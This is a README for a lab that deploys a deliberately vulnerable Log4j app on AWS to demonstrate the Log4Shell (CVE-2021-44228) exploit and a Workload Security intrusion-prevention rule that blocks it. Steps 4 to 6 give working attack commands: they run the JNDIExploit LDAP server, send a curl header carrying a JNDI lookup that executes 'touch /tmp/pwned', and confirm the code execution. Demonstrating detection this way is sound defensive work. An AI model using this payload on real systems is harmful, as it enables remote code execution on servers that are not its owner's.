Quick Deploy to show case cve-2021-44228

Cloud One - Workload Security Log4Shell

This repo contains a quick deployment template to showcase CVE-2021-44228 LOG4SHELL exploit and Workload Security Intrusion Prevention

Note on CFT deployment in AWS regions

  • I only added AMI Id's for US-EAST-1, US-EAST-2, US-WEST-1, US-WEST-2, CA-CENTRAL-1, SA-EAST-1, EU-WEST-1.

Deploy CloudFormation Template

Parameters to Define:

  • KeyPair: Name of a current Key Pair
  • IPforSSH: restrict SSH access to your IP. Default is

Launch Stack


After CloudFormation Template Deployment

1. SSH into EC2 instance(Shell A)

sudo su
<Deploy Workload Security Agent deployment script with Linux Policy attached.>


2. In Cloud One-WS: Assign IPS rule for CVE-2021-44228 to linux machine

- IPS rule number: **1011242** or **1008610**
- Assign rule and change to **Detect Only** for now.
- Accept all rule dependencies.

Click here for additional coverage on Apache Log4j "Log4Shell" Remote Code Execution 0-Day Vulnerability (CVE-2021-44228)



3. Start docker app(Shell A)

cd log4shell-vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app


4. Open Second SSH session(Shell B) and run command to create LDAP server

  • JNDIExploit provided by feihong-cs before it was removed from GitHub.
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888

5. Run Exploit

  • Open new SSH session(Shell C)
# will execute 'touch /tmp/pwned'
curl -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

Notice the output(Shell B) of JNDIExploit, showing it has sent the malicious LDAP response and served the second-stage payload:


6. Confirm RCE was successful with the creation of pwned.txt file inside the running container's /tmp directory.

  • Using Shell C
docker exec vulnerable-app ls /tmp


Repeat attack this time with IPS rule set to Prevent
